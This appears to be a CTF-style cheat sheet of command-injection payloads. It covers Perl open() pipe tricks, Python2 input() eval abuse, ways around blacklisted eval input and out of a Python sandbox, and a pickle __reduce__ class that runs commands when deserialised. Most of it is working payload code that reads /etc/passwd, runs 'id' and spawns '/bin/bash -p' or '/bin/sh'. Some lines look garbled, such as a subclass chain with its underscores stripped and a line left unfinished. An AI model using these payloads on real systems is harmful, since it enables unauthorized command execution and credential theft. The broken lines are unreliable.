Command Injection¶
```tab="Perl open(F, $file)"
If the filename begins with "|", the filename is interpreted as a command¶
to which output is to be piped, and if the filename ends with a "|", the¶
filename is interpreted as a command which pipes output to us.¶
append | to the end of a file name to have open execute the file¶
/path/to/script|
| command to execute¶
| cat /etc/passwd | whoami; id; pwd
1>&2|¶
cat /etc/passwd 1>&2| cat .passwd|xargs touch| #tries to create a file named with the flag contents
```python tab="Python2 input()"
# input is equivalent to eval(raw_input(prompt))
sys.stdout.write(open("/etc/passwd").readline())
execfile("/PATH/TO/SCRIPT")
open('/tmp/passwd', 'w').write(open('/etc/passwd').readline().strip())
eval(compile('import os; os.system("id")', 'foobar.py', 'exec'))
eval(compile('import os; os.system("/bin/bash -p")', 'f', 'exec'))
# redefine script functions:
eval(compile('def youLose():\n print passwd','foobar.py','exec'))
# redefine builtin functions:
eval(compile('int = __builtins__.__dict__["print"]','foobar.py','exec'))
__import__('os').system('/bin/bash -p')
__import__('os').execl('/bin/sh','sh')
# set PYTHONINSPECT before executing the python script to enter interactive
# mode after executing the script or the command
declare -x PYTHONINSPECT=’1’ ;
```python tab="python eval/exec (blacklisted input)"
if quotes(single and double) are blacklisted:¶
use combination of dir(), getattr()¶
specifically func_globals¶
for x in dir(FUNCTION): print {x: getattr(FUNCTION, x)}
¶
os = eval('im' + 'port("os")') getattr(os, "system")
if builtins are deleted:¶
https://zolmeister.com/2013/05/escaping-python-sandbox.html¶
().class.base.subclasses()[59].enter.func.globals['linecache'].checkcache.globals['os'].system
59 = ¶
```python tab="python pickle exploit"
import os
import pickle
def pickle_me(cmd):
class Exploit(object):
def __reduce__(self):
# return (eval('os.system'), (cmd,))
return (os.system, (cmd,))
return pickle.dumps(Exploit())